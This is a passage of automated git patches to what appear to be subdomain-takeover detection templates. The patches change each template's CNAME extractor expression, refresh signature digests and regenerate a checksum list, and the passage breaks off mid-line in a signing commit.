"resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100a5d612e8edd2e7e0be76838eafb7fc5255b09b098f6a5984d80674fae34dbec702202ded396f540ff22e864c5c7584feea766ed7c012d225ff0b6854e487d4368e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tave-takeover.yaml b/http/takeovers/tave-takeover.yaml index 779a509634..968c28e08e 100644 --- a/http/takeovers/tave-takeover.yaml +++ b/http/takeovers/tave-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100f567fa227ec1c59ea5e3cd810ff5fa7165cb404dd5c23c4889fd57a9e8d600320220561e1f08ae5f4a8f8ccb587892a42ae224f67044eac30646fb8e25ce86e56cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/teamwork-takeover.yaml b/http/takeovers/teamwork-takeover.yaml index c74df7c143..b725aeeccc 100644 --- a/http/takeovers/teamwork-takeover.yaml +++ b/http/takeovers/teamwork-takeover.yaml @@ -27,5 +27,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402200c14959578832299911cfd57d60b8d2742088dcd2a6859ee930dca59c18d3d8102201c8783b996d7e0adbe4fb289016896ba02fc9a8b12f0fab47abb54d96a262fb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tilda-takeover.yaml b/http/takeovers/tilda-takeover.yaml index 54171f4cc7..2890024e8e 100644 --- a/http/takeovers/tilda-takeover.yaml +++ b/http/takeovers/tilda-takeover.yaml @@ -34,5 +34,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502202336fcd9a9f8d6c225058e80a03e5698c9aaff69b30cb55f7db16756da443f59022100a1411c4e1c57bd88cb6850e53bb523bf8c33c19d101c2764b7b2e7572a9548bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tumblr-takeover.yaml b/http/takeovers/tumblr-takeover.yaml index 3cc992be2b..7582f8c066 100644 --- a/http/takeovers/tumblr-takeover.yaml +++ b/http/takeovers/tumblr-takeover.yaml @@ -38,5 +38,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402206bf1167a9114d4022f618a63a9308698d869c9fa8e51cbf1214b692f4dcd12a4022073558f02e64b15ed6512e98855a6f1d26b9db6d51091ffe75ae2b39fea7cdc3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uberflip-takeover.yaml b/http/takeovers/uberflip-takeover.yaml index b56fb41612..65a6bf2445 100644 --- a/http/takeovers/uberflip-takeover.yaml +++ b/http/takeovers/uberflip-takeover.yaml @@ -30,5 +30,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022100daf9a1e1c0d06425b0dc3694ebf3bc3765d763ec74894d6108a340b90d9d47360220313466225809ee86d23bde59df5029bdce7aca0d01c64439a428875bd494972a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uptime-takeover.yaml b/http/takeovers/uptime-takeover.yaml index 5da9d5b1bc..ff825a3537 100644 --- a/http/takeovers/uptime-takeover.yaml +++ b/http/takeovers/uptime-takeover.yaml @@ -33,5 +33,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402206ae2e4db61257dc700fe2d71b47dfbe0f242e7a9531703ebe3faad83112f25fa02204de1723eed20893ec58a00cb7f0cd7caa2ba0c32cb0fdd897f98626fd8a39677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uptimerobot-takeover.yaml b/http/takeovers/uptimerobot-takeover.yaml index 2ddc829e70..db639a465e 100644 --- a/http/takeovers/uptimerobot-takeover.yaml +++ b/http/takeovers/uptimerobot-takeover.yaml @@ -40,5 +40,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a004630440220107442093374d13645d0fc634dbd22e0f935034d353c5e008af1f425915be41e0220425e7e0dc419aa3b41478ad23144a355d6a91a2b2e2b57ff14075160cef6f917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uservoice-takeover.yaml b/http/takeovers/uservoice-takeover.yaml index 35f49ef2fe..834de192ce 100644 --- a/http/takeovers/uservoice-takeover.yaml +++ b/http/takeovers/uservoice-takeover.yaml @@ -30,5 +30,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022078cb1c9e43356b1552b148b33bf5f893b30896bd5abe83163c7309be3645b321022100ab778902fad53051087acce72732788a6769482f444d888820afd1b18fc1d4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/vend-takeover.yaml b/http/takeovers/vend-takeover.yaml index 8ad96acd38..282ec0c48f 100644 --- a/http/takeovers/vend-takeover.yaml +++ b/http/takeovers/vend-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a00463044022022b0dbe1f5b60787a47074d6cae789b61b13c818f2ca63ce171a19619234fad902205964e2fbce1403f6666f39493673d3a872b6ba0b754e33dde78521d860fbd95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wishpond-takeover.yaml b/http/takeovers/wishpond-takeover.yaml index 6656d8b3fb..73390570a6 100644 --- a/http/takeovers/wishpond-takeover.yaml +++ b/http/takeovers/wishpond-takeover.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a0048304602210083675b02f7c8e221e2d34f7d84d811f5e4fc33bd8efd54d643bf93e50eab8c8e022100814989f73d6a81f313d461120e8267717dea9e516ee28e9489f067bb462d7f95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wix-takeover.yaml b/http/takeovers/wix-takeover.yaml index cdac6dd3af..4af77e6e28 100644 --- a/http/takeovers/wix-takeover.yaml +++ b/http/takeovers/wix-takeover.yaml @@ -35,5 +35,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100a0cd6884c061b436ce7561a8d58fd8854b9c2c170c58015efba8998235279be902210095a56be16d9ddb30e7ff4524c444d5337b8952e5dc963380d83bb061d9091a7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wordpress-takeover.yaml b/http/takeovers/wordpress-takeover.yaml index a313613c73..86a551db79 100644 --- a/http/takeovers/wordpress-takeover.yaml +++ b/http/takeovers/wordpress-takeover.yaml @@ -37,5 +37,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 490a0046304402200e210350415af8d696a974aad4b7afad97e09eb49b626d286ba49bfc002c57d102202c34a0126212979cb71c47da6b0a283c71c61f4aba18f41b8bdbec5b70c10328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index be82d9c7a9..9cb89b3df4 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -47,5 +47,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a00473045022015e2656c9f329d20fd4891ffcb9834632dac58c492aa84ac9c1666ee62136621022100a36e344c48be6ee62f9f857801310f73f405cd9b5df22503a00171ea141b17c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wufoo-takeover.yaml b/http/takeovers/wufoo-takeover.yaml index 1f12919f02..33aae0f52b 100644 --- a/http/takeovers/wufoo-takeover.yaml +++ b/http/takeovers/wufoo-takeover.yaml @@ -31,5 +31,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502201d2109545256fa0c6655011f8c2109fa145b39721cb7fd66b54240071e31dbed022100fb299c8eeb837c84fbb26d69c8c805d8add5b67d09e6a7b8a9ca73dd7cd77233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/zendesk-takeover.yaml b/http/takeovers/zendesk-takeover.yaml index 24ce00c0a5..f3980b2d5c 100644 --- a/http/takeovers/zendesk-takeover.yaml +++ b/http/takeovers/zendesk-takeover.yaml @@ -33,5 +33,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100a3eb6a6435a19adedbce449af23b505508d27a492504f2b6de496d0ea53d2dec022100ea6e2f16a078c3406b623e4c67bd1ee41c4273bef10fe48f8fee50f5cc35822a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e55ba20459619bb8929628f14f05c9c11bbe69b0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 14:38:43 +0000 Subject: [PATCH 1333/1841] Auto Generated Templates Checksum [Wed Jul 17 14:38:43 UTC 2024] :robot: --- templates-checksum.txt | 146 ++++++++++++++++++++--------------------- 1 file changed, 73 insertions(+), 73 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3292d3938b..4e50858047 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6807,78 +6807,78 @@ http/osint/user-enumeration/zillow.yaml:6310312dfbeca22632a8b56feaf02d6a8d63c2a5 http/osint/user-enumeration/zmarsacom.yaml:ffb6dde4769b58aed12e36b600faa66348c2f3a0 http/osint/user-enumeration/zomato.yaml:611325521c42aab8a0117b819dcecb3aae9d8df4 http/osint/user-enumeration/zoomitir.yaml:deb452a0a5dd3bbfad1feadbacc72e7c97ba832f -http/takeovers/aftership-takeover.yaml:05139dc9b684651e5818a5524edc14c461e30716 -http/takeovers/agilecrm-takeover.yaml:cee0e85eee5f107be69af56c2058e2a8d8f9ba2f -http/takeovers/aha-takeover.yaml:b4e39901da788731f30c59f3ec709d988d602909 -http/takeovers/airee-takeover.yaml:02aee314894161e2a9a388b6673b5d1b82203e2e -http/takeovers/anima-takeover.yaml:5ea19c04bc236de696bf244ec347269486faf621 -http/takeovers/announcekit-takeover.yaml:dd7ce66bbc73813ebcb863127294eff490fca763 +http/takeovers/aftership-takeover.yaml:069205c50d00b4ff86cd3a5fbe9125b9f1a64a32 +http/takeovers/agilecrm-takeover.yaml:ea29bef2bc93156ecf71dc01c6d1d4446516b98d +http/takeovers/aha-takeover.yaml:488b6c9e716c46bceb6215c2d76696e53d78a928 +http/takeovers/airee-takeover.yaml:ee6cc5e920fe110ca5dd81a47d16fbfb02305018 +http/takeovers/anima-takeover.yaml:336d7f7528cbf6c356965dc5338a1f0529d9bb03 +http/takeovers/announcekit-takeover.yaml:d2dcc22772060875e38c6625681bdeb809c42000 http/takeovers/aws-bucket-takeover.yaml:770a292dd17881dfae48ae42c559224087da1a51 -http/takeovers/bigcartel-takeover.yaml:d2b5b44c136c422222bb48d50964786d42e759c0 -http/takeovers/bitbucket-takeover.yaml:c35652a5a717dd1ab6ac3d9dda2359baad7b2984 -http/takeovers/campaignmonitor-takeover.yaml:a0a0ff2ddec8703a4524f21440070944ac683064 -http/takeovers/canny-takeover.yaml:20f6dccf41271ed119c333de3487752c38f39c07 -http/takeovers/cargo-takeover.yaml:4d8573eb5fa8c8da2694a575e08d9660178da6f8 -http/takeovers/cargocollective-takeover.yaml:cb012913be6827e9637522b9b49b4de33378d2b8 -http/takeovers/clever-takeover.yaml:349738761d13fc8eebb1d08065afcd91db1a463a -http/takeovers/flexbe-takeover.yaml:617163c63ffb59ec2f94d4d5fd7995f27b261f1a -http/takeovers/frontify-takeover.yaml:8e7b5944d4ea9cd2bfe1c0a53c3f4afb8cd1c5e1 -http/takeovers/gemfury-takeover.yaml:99b2b5e97eb4d80e85058d39901e90611ba65fef -http/takeovers/getresponse-takeover.yaml:3a585afe9dd14bb01f7a50f731c88bc14e2e45db -http/takeovers/ghost-takeover.yaml:0b98919dbf8fd60af59d9f742b1ab64a027c4366 -http/takeovers/gitbook-takeover.yaml:92f9bbccaed9efd292242faf2c71df9c3eafb2dc -http/takeovers/github-takeover.yaml:386272c1ca1c25f4611d5bce83ea3655b7a40273 -http/takeovers/gohire-takeover.yaml:b2142614c80428b9e20d4d1f7c578f37bac2569f -http/takeovers/hatenablog-takeover.yaml:b4779c3a0fbafcb74b61768a6477648e4cf7cc5e -http/takeovers/helpdocs-takeover.yaml:44ceceb714418c55e679f095ae3ddef393914708 -http/takeovers/helpjuice-takeover.yaml:c6d8566abe761cff3ec6e722fa2bf980592b0b13 -http/takeovers/helprace-takeover.yaml:b51bc278ef232e247a5eb24bbe064c1a0d15523c -http/takeovers/helpscout-takeover.yaml:17a99cf7d0dc9847c71dacfb2ab5535fed3758c2 -http/takeovers/hubspot-takeover.yaml:4d3fbf5e3e0532e6110b9f123d8e9ed090c443a2 -http/takeovers/intercom-takeover.yaml:298429562781185cd36e9935edcbf6cd937ef8d2 -http/takeovers/jazzhr-takeover.yaml:3add0ef377bc3ca2005fa84194711d3cbd51ee93 -http/takeovers/jetbrains-takeover.yaml:fbc0b5793b40a7be5d4346931640783044976d2a -http/takeovers/kinsta-takeover.yaml:2087e379b14a4035aca1a6ad89f473e12849e4ee -http/takeovers/launchrock-takeover.yaml:c16beaffeca68dc6c36475b27ea849a28998642b -http/takeovers/leadpages-takeover.yaml:ddb2bfa0a09ceb5e5f2d26674398873bcc4c6d4f -http/takeovers/lemlist-takeover.yaml:66c930c72d2e07d24a99c333bf96e35bc1b23c5f -http/takeovers/mashery-takeover.yaml:6ff5f87eb2c1f049158d4849b0238cde86ef753e -http/takeovers/meteor-takeover.yaml:c6660758719064b8f230a28174e584f14ee7619d -http/takeovers/netlify-takeover.yaml:69670380a3150b4ce79b125dd7ff6881161e2daf -http/takeovers/ngrok-takeover.yaml:b847bdd5f77acac2a99ca1120d760e606bccfc1b -http/takeovers/pagewiz-takeover.yaml:db60f97af153fa8a25462814bd19e35ad8f3e15b -http/takeovers/pantheon-takeover.yaml:4bd1ea0ffc473c9fab9bf3cd3ab569d2bbc7489a -http/takeovers/pingdom-takeover.yaml:7276d288254b419d4ab756b05b817c66c33c8ffa -http/takeovers/proposify-takeover.yaml:b33442a7a79511b8256806ef999a0119262da0a7 -http/takeovers/readme-takeover.yaml:3c08478b730675af14bf326cd62bbe7fa7c1b911 -http/takeovers/readthedocs-takeover.yaml:f91df3e74e341599bbc435760834facbc8d95f09 -http/takeovers/shopify-takeover.yaml:0e867ab07e477758343ceff7f395fc960130e1aa -http/takeovers/short-io.yaml:2e83fa0332ba0b0f9a7082fb80da1a4989717308 -http/takeovers/simplebooklet-takeover.yaml:6df5f6aed5b371fc8b59f45f24d78fe9a43dcb9e -http/takeovers/smartjob-takeover.yaml:25a7060d297779ca355feaff65a6c4433a4199b3 -http/takeovers/smugmug-takeover.yaml:a5eb25768684535dc3bb4504f1b11d14f91a4d82 -http/takeovers/softr-takeover.yaml:e7f25a55f68cdc1ba2aaaa9201dd199e2f1fd681 -http/takeovers/sprintful-takeover.yaml:05a17fba19add15d709f69ceef290056af224d70 -http/takeovers/squadcast-takeover.yaml:8a014335f429a0fc21fe0fef6c4236f38ee13db7 -http/takeovers/strikingly-takeover.yaml:eb2d72f5f06ec55aebf185c9a73e6818c5d5d1d6 -http/takeovers/surge-takeover.yaml:0f196cce4a0b58d406064ebab4e4eb3927c6fdf2 -http/takeovers/surveygizmo-takeover.yaml:f57ba472abf501f584b8b5a1b20234af4420cc21 -http/takeovers/surveysparrow-takeover.yaml:a08cfc93ec981499465e00d64c8c2ad3249b21bf -http/takeovers/tave-takeover.yaml:05a30fc25c7cb2d3dea1da719cf8a08c7da59607 -http/takeovers/teamwork-takeover.yaml:3394fade18e7adeb195e62dd17bd97c2dc2f906d -http/takeovers/tilda-takeover.yaml:9f3021d59f553b2e03cb870e1de49050f9ac207e -http/takeovers/tumblr-takeover.yaml:56f2202007c5546719fe26272c49d5f9fe0fad6e -http/takeovers/uberflip-takeover.yaml:bcc75315895da7bef8640edaf53e34e563ce3ef7 -http/takeovers/uptime-takeover.yaml:9e0e782f54639b4661c0c7c3ca9abe745a4ed550 -http/takeovers/uptimerobot-takeover.yaml:a58648bd0a4b16b1c491ef661010f5e1fc70f838 -http/takeovers/uservoice-takeover.yaml:be4762a9164ea4cff35f2db0ff055f46329acd17 -http/takeovers/vend-takeover.yaml:59dc9446df5bd7009ea8438dc568d427304fad32 -http/takeovers/wishpond-takeover.yaml:92a7b4f4986a6fb8d2809579c39dbc819d94696f -http/takeovers/wix-takeover.yaml:93579bd0c277ad2ac3ae8f8738bd810202efe5a6 -http/takeovers/wordpress-takeover.yaml:10f886de9667842e25b68b2880d708117d065b34 -http/takeovers/worksites-takeover.yaml:cb3f82773587d4d51c05e5e7c3a2295ef6e174c1 -http/takeovers/wufoo-takeover.yaml:d9b63bad4dad6b3c257fa974b7fa52a876a3ddd4 -http/takeovers/zendesk-takeover.yaml:28ad866ebe48bcbba85d4504dc4cc96b3db65bc7 +http/takeovers/bigcartel-takeover.yaml:61aa9c86f57778f7534c31669d7aadc12ac3e6fb +http/takeovers/bitbucket-takeover.yaml:37a3d13eae1640753df0d45badc2d496c11d2bb0 +http/takeovers/campaignmonitor-takeover.yaml:2978382f88ea9a0bff0184c870ee76c19125437a +http/takeovers/canny-takeover.yaml:4a658b3018ed53acac054438e3e14a2a016360f8 +http/takeovers/cargo-takeover.yaml:5a8cba5b29d6ef34c616d903e009613be51362b1 +http/takeovers/cargocollective-takeover.yaml:610310b0edb31f0b363c22cf0a95b14273ab070d +http/takeovers/clever-takeover.yaml:1ec6a4879432cd8a0b38a9f904235c8b5400d578 +http/takeovers/flexbe-takeover.yaml:9e7f6cf2236d796c8dfa6ef352a5db717f0e2116 +http/takeovers/frontify-takeover.yaml:206ea0cecf27ecd9b3b1ab4367e52113d6d779ef +http/takeovers/gemfury-takeover.yaml:c77c3742467c458efb3c6a13bd7c1988a1486cdf +http/takeovers/getresponse-takeover.yaml:8a41df31712d189b309a362c08c97c59b757d714 +http/takeovers/ghost-takeover.yaml:9ef9ae599b8694c0c74a18a83d29a33fcd2cc42e +http/takeovers/gitbook-takeover.yaml:838870bccdf1f8178e1a15628503e325762a8a96 +http/takeovers/github-takeover.yaml:e0f8845ea71cebeea710af9a06651cdb8b9e3312 +http/takeovers/gohire-takeover.yaml:ed124cab5b16ce0272decbbf0a61205c562d8475 +http/takeovers/hatenablog-takeover.yaml:8544f7417ea29a5e21bdc8f89cbcd0e5e5e5a094 +http/takeovers/helpdocs-takeover.yaml:4432d3bc37a4d749de2dbaad0290d5cfd31e263a +http/takeovers/helpjuice-takeover.yaml:0add9aeba21683a96357646f3fb1b179b2f5906d +http/takeovers/helprace-takeover.yaml:12a22aede35dcca70c4f06403f80ecf34207c4cb +http/takeovers/helpscout-takeover.yaml:f1021eb7813bd163caf73fe47d67248254f7ebae +http/takeovers/hubspot-takeover.yaml:e75d0ef408cfa76963cf1a5be2842d72b760cc20 +http/takeovers/intercom-takeover.yaml:55b4b2ab39e2340d5166fa2ea862ed81fe9eab4c +http/takeovers/jazzhr-takeover.yaml:ccfa03e4754c9eb73e2f9285c05d929ee56fbdee +http/takeovers/jetbrains-takeover.yaml:af58c635cdaeced195a4eb82dd7569a471574bbf +http/takeovers/kinsta-takeover.yaml:73c6c7c121994e36ffc18f484ec1af29d65568b0 +http/takeovers/launchrock-takeover.yaml:7229fe3d665d79a444a666dea2780a2b66fc5f17 +http/takeovers/leadpages-takeover.yaml:ba93408ff87594553456ec3865e70217c693caf2 +http/takeovers/lemlist-takeover.yaml:06622483538647175f70e4c838ce05f005ff3960 +http/takeovers/mashery-takeover.yaml:c736c94e6a6ae1b147645659d9f01bf3fc724449 +http/takeovers/meteor-takeover.yaml:7182dc2d5d0e8f6112c36ef93164db24bb7da999 +http/takeovers/netlify-takeover.yaml:7bdb14ececbb10443f234b4cbda555a46a5e72a1 +http/takeovers/ngrok-takeover.yaml:76736d354bf8f92bb8cde82d8d746e21ab642cb9 +http/takeovers/pagewiz-takeover.yaml:1f6ce96db902a68afd2bbc4e13272e2411eed96d +http/takeovers/pantheon-takeover.yaml:0eaa4d675dec3ad06785b881863a8f00540bfcbb +http/takeovers/pingdom-takeover.yaml:2dd6934672e77511f7ad3588d151982d77e5e4ec +http/takeovers/proposify-takeover.yaml:b5ef1e8644085b37a2fe9d20d4d3c7f7804a2a67 +http/takeovers/readme-takeover.yaml:d9e233c43a4f6f8e7bf6b06be3d5bb5c0036ddc0 +http/takeovers/readthedocs-takeover.yaml:cbcd46fb93fbadd6b0d00ce7aca2f743f8aaeff2 +http/takeovers/shopify-takeover.yaml:afad2113dba5b407f30e387b5176a2494ef68ca9 +http/takeovers/short-io.yaml:daa048f99b924927544f508ad5716e81d6497627 +http/takeovers/simplebooklet-takeover.yaml:e8c29126627d96e8c4e56ccf1b115ae9ca0e96ec +http/takeovers/smartjob-takeover.yaml:9a03cde93c694fab773b5a3cb97662f530813232 +http/takeovers/smugmug-takeover.yaml:a0cdd4e8f7455ac1062e084ec15651f80ae5b461 +http/takeovers/softr-takeover.yaml:8a787ce0846c240b9a1abd2a49c8f734057bc85a +http/takeovers/sprintful-takeover.yaml:482dda18d58fcaa3eb959e84bb7298b2cb9710fa +http/takeovers/squadcast-takeover.yaml:7178c123d297f5780fb743ced6b74f92d22fcd5a +http/takeovers/strikingly-takeover.yaml:131aa9f30a5ba0766df9c02a182c08f5a75d9b93 +http/takeovers/surge-takeover.yaml:77e51ed412624dbe4bdf275e0fecc7bd28739131 +http/takeovers/surveygizmo-takeover.yaml:3d17a9db43c32f131ef32be89692fa78887e2a0e +http/takeovers/surveysparrow-takeover.yaml:197c3e641f8d439e6d40df198e8453d70b08f814 +http/takeovers/tave-takeover.yaml:eafb6f75732c4afa8fb538c4c5b7c6c392004b97 +http/takeovers/teamwork-takeover.yaml:dd8d78492cef2cb8d616f84fb6b7681991acae32 +http/takeovers/tilda-takeover.yaml:ea9c072774c0052fa9a11989a2d88cc9a16fcda8 +http/takeovers/tumblr-takeover.yaml:539c9abc375aaeadc6d5cf51f5e54868761bb8f7 +http/takeovers/uberflip-takeover.yaml:20345e4d8fdc70d39c167c401fd1fd2d7820eba8 +http/takeovers/uptime-takeover.yaml:26ffd1a8b1f50f59f45d8466d7760b1ea67fc936 +http/takeovers/uptimerobot-takeover.yaml:ca6e92b1186de2f75b7218c43b349f28c052b04f +http/takeovers/uservoice-takeover.yaml:3c176091b63c8147c8ed8f15b10dae9dd59b6115 +http/takeovers/vend-takeover.yaml:fe04b034e116c9ce915a17fedb5f4fd87352f1c2 +http/takeovers/wishpond-takeover.yaml:5c9794bfe5888f99ba6d1e9481c8107c42625388 +http/takeovers/wix-takeover.yaml:619522f4f594a3db207c710de092472d1422249e +http/takeovers/wordpress-takeover.yaml:a64987be8e1dd418791e5fb28ea2d7c00a6f4e43 +http/takeovers/worksites-takeover.yaml:b8eea20d823ecadd37c633df3928cbcc99ca7c1f +http/takeovers/wufoo-takeover.yaml:0bae53b2430ddcffbfb1e3d7686c186adcf18a71 +http/takeovers/zendesk-takeover.yaml:242274440eae8dd08a92c31a11200fe047862b36 http/technologies/4D-detect.yaml:4b948a54eb2718980daa15d0ce2aaf5ee1bf843b http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 @@ -6896,7 +6896,7 @@ http/technologies/akamai-detect.yaml:e3f8ed7c09e39c12c794d4d93846d9fa204d1c1b http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be87934dcf3ed38 http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77 http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b -http/technologies/apache/airflow-detect.yaml:bf406c07ef9dfbaaa5d600d48db3b28ae7871511 +http/technologies/apache/airflow-detect.yaml:4bbac622babfffb328fc8268a33653ac5aca51df http/technologies/apache/apache-answer-detect.yaml:48deef16a566d4847d23b77e4efcbc6d58690f8f http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd http/technologies/apache/apache-cloudstack-detect.yaml:c08888a73f19a2dd082a7a928862ac07de5c7a24 @@ -8888,7 +8888,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f6ac373ab772212e09396bc03203208dff7196ef +templates-checksum.txt:5067d37937cbd0dcb92a50c936c1ef7f487a195d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 51194f2d14fb1fedbd139050084ee1536b3ae6c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 14:40:22 +0000 Subject: [PATCH 1334/1841] Auto Template Signing [Wed Jul 17 14:40:22 UTC 2024] :robot: --- http/takeovers/aftership-takeover.yaml | 2 +- http/takeovers/agilecrm-takeover.yaml | 2 +- http/takeovers/aha-takeover.yaml | 2 +- http/takeovers/airee-takeover.yaml | 2 +- http/takeovers/anima-takeover.yaml | 2 +- http/takeovers/announcekit-takeover.yaml | 2 +- http/takeovers/bigcartel-takeover.yaml | 2 +- http/takeovers/bitbucket-takeover.yaml | 2 +- http/takeovers/campaignmonitor-takeover.yaml | 2 +- http/takeovers/canny-takeover.yaml | 2 +- http/takeovers/cargo-takeover.yaml | 2 +- http/takeovers/cargocollective-takeover.yaml | 2 +- http/takeovers/clever-takeover.yaml | 2 +- http/takeovers/flexbe-takeover.yaml | 2 +- http/takeovers/frontify-takeover.yaml | 2 +- http/takeovers/gemfury-takeover.yaml | 2 +- http/takeovers/getresponse-takeover.yaml | 2 +- http/takeovers/ghost-takeover.yaml | 3 ++- http/takeovers/gitbook-takeover.yaml | 2 +- http/takeovers/github-takeover.yaml | 2 +- http/takeovers/gohire-takeover.yaml | 2 +- http/takeovers/hatenablog-takeover.yaml | 2 +- http/takeovers/helpdocs-takeover.yaml | 2 +- http/takeovers/helpjuice-takeover.yaml | 2 +- http/takeovers/helprace-takeover.yaml | 2 +- http/takeovers/helpscout-takeover.yaml | 2 +- http/takeovers/hubspot-takeover.yaml | 2 +- http/takeovers/intercom-takeover.yaml | 2 +- http/takeovers/jazzhr-takeover.yaml | 2 +- http/takeovers/jetbrains-takeover.yaml | 2 +- http/takeovers/kinsta-takeover.yaml | 2 +- http/takeovers/launchrock-takeover.yaml | 2 +- http/takeovers/leadpages-takeover.yaml | 2 +- http/takeovers/lemlist-takeover.yaml | 2 +- http/takeovers/mashery-takeover.yaml | 2 +- http/takeovers/meteor-takeover.yaml | 2 +- http/takeovers/netlify-takeover.yaml | 2 +- http/takeovers/ngrok-takeover.yaml | 2 +- http/takeovers/pagewiz-takeover.yaml | 2 +- http/takeovers/pantheon-takeover.yaml | 2 +- http/takeovers/pingdom-takeover.yaml | 2 +- http/takeovers/proposify-takeover.yaml | 2 +- http/takeovers/readme-takeover.yaml | 2 +- http/takeovers/readthedocs-takeover.yaml | 2 +- http/takeovers/shopify-takeover.yaml | 2 +- http/takeovers/short-io.yaml | 2 +- http/takeovers/simplebooklet-takeover.yaml | 2 +- http/takeovers/smartjob-takeover.yaml | 2 +- http/takeovers/smugmug-takeover.yaml | 2 +- http/takeovers/softr-takeover.yaml | 2 +- http/takeovers/sprintful-takeover.yaml | 2 +- http/takeovers/squadcast-takeover.yaml | 2 +- http/takeovers/strikingly-takeover.yaml | 2 +- http/takeovers/surge-takeover.yaml | 2 +- http/takeovers/surveygizmo-takeover.yaml | 2 +- http/takeovers/surveysparrow-takeover.yaml | 2 +- http/takeovers/tave-takeover.yaml | 2 +- http/takeovers/teamwork-takeover.yaml | 2 +- http/takeovers/tilda-takeover.yaml | 2 +- http/takeovers/tumblr-takeover.yaml | 2 +- http/takeovers/uberflip-takeover.yaml | 2 +- http/takeovers/uptime-takeover.yaml | 2 +- http/takeovers/uptimerobot-takeover.yaml | 2 +- http/takeovers/uservoice-takeover.yaml | 2 +- http/takeovers/vend-takeover.yaml | 2 +- http/takeovers/wishpond-takeover.yaml | 2 +- http/takeovers/wix-takeover.yaml | 2 +- http/takeovers/wordpress-takeover.yaml | 2 +- http/takeovers/worksites-takeover.yaml | 2 +- http/takeovers/wufoo-takeover.yaml | 2 +- http/takeovers/zendesk-takeover.yaml | 2 +- 71 files changed, 72 insertions(+), 71 deletions(-) diff --git a/http/takeovers/aftership-takeover.yaml b/http/takeovers/aftership-takeover.yaml index b4c4878d58..87ca6761cc 100644 --- a/http/takeovers/aftership-takeover.yaml +++ b/http/takeovers/aftership-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502203bd36036183a037bd252566dbbb5e7f0816219e8cea973674b3f087995c41183022100b4efe16a28cab2e2e12dfe9019bbf1fe083d72eb5c660a2ab0bdbd5dce65d877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 